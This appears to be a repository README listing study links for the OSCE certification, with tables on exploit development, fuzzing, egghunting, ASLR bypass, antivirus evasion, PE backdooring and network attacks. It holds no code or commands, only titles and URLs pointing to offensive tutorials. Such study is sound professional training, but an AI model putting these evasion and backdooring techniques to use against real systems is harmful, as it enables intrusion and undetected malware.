The Journey to OSCE
This repository contains a list of free or inexpensive resources that can be used as preparation for Offensive Security's Cracking the Perimeter (CTP) course and OSCE certification.
The following table shows notes, courses, challenges, and tutorials that can be used in preparation for the OSCE. It should be noted that the content within multiple sources do overlap each other so not all of these resources are needed.
The code located herein is associated with the various tutorials listed.
Sam Sanoop started this list and I noticed that there is more to be done!
Debugging
Name | Type | Link |
---|---|---|
[Pentester Academy] (SecurityTube) GNU Debugger Megaprimer | Video Series | https://www.pentesteracademy.com/course?id=4 |
[InfoSec Institude] Exploit Dev Debugging Fundamentals | Blog | https://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-development/ |
WinDBG Commands | Cheatsheet | https://briolidz.wordpress.com/2013/11/17/windbg-some-debugging-commands/ |
[Corelan] Exploit Writing Tutorial part 5: How debugger modules & plugins can speed up basic exploit development | Blog | http://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/ |
[Corelan] Mona.py The Manual | Cheatsheet | https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/r |
Mona py : The Exploit Writer's Swiss Army Knife | Presentation | https://www.youtube.com/watch?v=y2zrEAwmdws |
Web Application Security
AV Bypass / Evasion
Name | Type | Link |
---|---|---|
Art of Anti Detection #1 - Intro to AV & Detection Techniques | Paper | http://web.archive.org/web/20161213055552/https://www.exploit-db.com/docs/40900.pdf |
Art of Anti Detection #1 - Intro to AV & Detection Techniques | Blog | https://pentest.blog/art-of-anti-detection-1-introduction-to-av-detection-techniques/ |
Bypassing AV Scanners | Paper | https://dl.packetstormsecurity.net/papers/bypass/bypassing-av.pdf |
[SecuritySift] peCloak.py - An Experiment in AV Evasion | Blog | https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/ |
Backdooring PEs
Name | Type | Link |
---|---|---|
Portable Executable File Format | Blog | https://blog.kowalczyk.info/articles/pefileformat.html |
Understanding PE Structure, The Layman's Way | Blog | https://tech-zealots.com/malware-analysis/pe-portable-executable-structure-malware-analysis-part-2/ |
Backdooring PE Files - Part 1 | Blog | http://sector876.blogspot.co.uk/2013/03/backdooring-pe-files-part-1.html |
Backdooring PE Files - Part 2 | Blog | http://sector876.blogspot.co.uk/2013/03/backdooring-pe-files-part-2.html |
Beginner's Guide to Codecaves | Blog | https://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves |
Backdooring Windows EXEs for Fun and Profit | Blog | http://ly0n.me/2015/07/09/backdooring-windows-exes-for-fun-and-profit-part-1/ |
Art of Anti Detection #2 - PE Backdoor Manufacturing | Paper | http://web.archive.org/web/20170401142227/https://www.exploit-db.com/docs/41129.pdf |
Art of Anti Detection #2 - PE Backdoor Manufacturing | Blog | https://pentest.blog/art-of-anti-detection-2-pe-backdoor-manufacturing/ |
Assembly Language & Shellcode
Fuzzing
Name | Type | Link |
---|---|---|
[InfoSec Institute] Intro to Fuzzing | Tutorial | https://resources.infosecinstitute.com/intro-to-fuzzing/ |
[InfoSec Institute] Fuzzer Automation with Spike | Tutorial | http://resources.infosecinstitute.com/fuzzer-automation-with-spike/ |
Introduction to Network Protocol Fuzzing & Buffer Overflow Exploitation | Blog | https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/ |
Very Unofficial Dummies Guide to Scapy | Tutorial | https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf |
HowTo: ExploitDev Fuzzing | Blog | https://hansesecure.de/2018/03/howto-exploitdev-fuzzing/ |
[Vulnserver] Exploiting TRUN Command via Vanilla EIP Overwrite | Blog | https://captmeelo.com/exploitdev/osceprep/2018/06/27/vulnserver-trun.html |
[Vulnserver] Boofuzzing Vulnserver for EIP Overwrite | Blog | https://h0mbre.github.io/Boofuzz_to_EIP_Overwrite/# |
Boofuzz – A helpful guide (OSCE – CTP) | Blog | https://zeroaptitude.com/zerodetail/fuzzing-with-boofuzz/ |
Stack Based Overflow:
Structured Exception Handling (SEH) Overwrite:
Egghunting
Name | Type | Link |
---|---|---|
[Skape] Safely Searching Process Virtual Address Space | Paper | https://web.archive.org/web/20061010194043/http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf |
[SecuritySift] Windows Exploit Dev #5: Locating Shellcode with Egghunting | Tutorial | http://www.securitysift.com/windows-exploit-development-part-5-locating-shellcode-egghunting/ |
[Corelan] Exploit Writing #8: Win32 Egghunting | Tutorial | https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ |
[FuzzySec] Windows Exploit Dev #4: Egg Hunters | Tutorial | http://fuzzysecurity.com/tutorials/expDev/4.html |
[Vulnserver] GMON Egghunter with Character Restrictions | Tutorial | https://h0mbre.github.io/Badchars_Egghunter_SEH_Exploit/ |
[HackSys Team] Egghunter | Paper | http://web.archive.org/web/20150717003732/https://www.exploit-db.com/docs/18482.pdf |
[SecuritySift] EggSandwich - An Egghunter with Integrity | Blog | https://www.securitysift.com/eggsandwich-egghunter-integrity/ |
Address Space Layout Randomization (ASLR) Bypass
Name | Type | Link |
---|---|---|
[Corelan] Exploit Writing #6: Bypassing Stack Cookies, SafeSEH, SEHOP, HW DEP, and ASLR | Tutorial | https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ |
Bypassing ASLR | Paper | http://web.archive.org/web/20171015120748/https://www.exploit-db.com/docs/18744.pdf |
Network Attacks
Name | Type | Link |
---|---|---|
TCP Session Hijacking | Paper | https://www.exploit-db.com/papers/13587 |
[Muts] Cisco SNMP Configuration Attack with GRE Tunnel | Paper | https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=50318646-6402-48f0-82db-25d00ac3d76c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments |
Hacking Networks with SNMP | Blog | https://web.archive.org/web/20180808174050/https://0x41.no/hacking-networks-with-snmp/ |
Bypassing Router's Access Control List | Blog | https://securityshards.wordpress.com/2016/02/05/bypassing-routers-access-control-list-acl/ |
Case Studies
Name | Type | Link |
---|---|---|
[Muts] From Bug to 0-Day | Presentation | https://www.youtube.com/watch?v=axTthxE-z6A |
[Muts] Bypassing Cisco SNMP Access Lists Using Spoofed SNMP Requests | Blog | https://web.archive.org/web/20051024151559/http://new.remote-exploit.org/index.php/SNMP_Spoof |
Encoding, Restrictions, Bad Characters, and Other Exploit Development Resources
Name | Type | Link |
---|---|---|
[Corelan] Exploit Writing #4: From Exploit to Metasploit | Tutorial | http://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ |
[Corelan] Exploit Writing #7: Unicode from 0x00410041 to calc | Tutorial | http://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/ |
[FuzzySec] Windows Exploit Dev #5: Unicode 0x00410041 | Tutorial | https://www.fuzzysecurity.com/tutorials/expDev/5.html |
[SecuritySift] Windows Exploit Dev #7: Unicode Buffer Overflows | Tutorial | https://www.securitysift.com/windows-exploit-development-part-7-unicode-buffer-overflows/ |
Eliminating the bad characters in your Exploit | Presentation | https://www.youtube.com/watch?v=IOjl3tU1Ht8 |
Practical
Name | Type | Link |
---|---|---|
Vulnserver | Lab | https://github.com/stephenbradshaw/vulnserver |
Introducing Vulnserver | Tutorial | http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html |
[Exploit-Exercises] Protostar | Lab | https://www.vulnhub.com/entry/exploit-exercises-protostar-v2,32/ |
[Exploit-Exercises] Protostar | Lab (Challenges) | https://web.archive.org/web/20180322220122/https://exploit-exercises.com/protostar/ |
[Exploit-Exercises] Fusion | Lab | https://www.vulnhub.com/entry/exploit-exercises-fusion-v2,15/ |
[Exploit-Exercises] Fusion | Lab (Challenges) | https://web.archive.org/web/20180820234507/https://exploit-exercises.com/fusion/ |
[OverTheWire] Narnia | Lab | https://overthewire.org/wargames/narnia/ |
Windows Internals (Not required, but definitely helpful)
Misc/Extra
Name | Type | Link |
---|---|---|
[Muts] Live Demo from Backtrack to the MAX 1/5 | Presentation | https://www.youtube.com/watch?v=kwq5VQj3Ils |
[Muts] Live Demo from Backtrack to the MAX 2/5 | Presentation | https://www.youtube.com/watch?v=ykfHy2lX88c |
[Muts]Live Demo from Backtrack to the MAX 3/5 | Presentation | https://www.youtube.com/watch?v=IWf7UM7qX0M |
[Muts] Live Demo from Backtrack to the MAX 4/5 | Presentation | https://www.youtube.com/watch?v=azepnwdVfyU |
[Muts] Live Demo from Backtrack to the MAX 5/5 | Presentation | https://www.youtube.com/watch?v=6gmAoW1mtYg |
[OffSec] Quickzip Stack BOF 0-Day: A Box of Chocolates | Blog | https://www.offensive-security.com/vulndev/quickzip-stack-bof-0day-a-box-of-chocolates/ |